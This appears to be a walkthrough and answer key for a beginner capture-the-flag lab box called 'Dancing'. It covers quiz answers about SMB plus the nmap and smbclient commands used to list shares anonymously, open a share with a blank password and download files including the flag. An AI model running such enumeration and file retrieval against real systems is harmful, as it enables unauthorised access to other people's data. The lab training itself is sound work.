Dancing
Target Information:
- 10.129.174.16
- PORTS:
- 135/tcp open msrpc
- 139/tcp open netbios-ssn
- 445/tcp open microsoft-ds
- NETWORK SHARES:
- ADMIN$ Disk Remote Admin
- C$ Disk Default share
- IPC$ IPC Remote IPC
- WorkShares Disk
============================================
Task #1: What does the 3-letter acronym SMB stand for?
- A: Server Message Block
Task #2: What port does SMB use to operate at?
- A: 445
Task #3: What is the service name for port 445 that came up in our Nmap scan?
- A: microsoft-ds
- nmap 10.129.174.16
Task #4: What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
- A: -L
Task #5: How many shares are there on Dancing?
- A: 4
- smbclient -N -L 10.129.174.16
Task #6: What is the name of the share we are able to access in the end with a blank password?
- A: WorkShares
- smbclient -N \\10.129.174.16\WorkShares
Task #7: What is the command we can use within the SMB shell to download the files we find?
- A: get
- help
Root Flag:
- get Amy.J/worknotes.txt worknotes.txt
- get James.P\flag.txt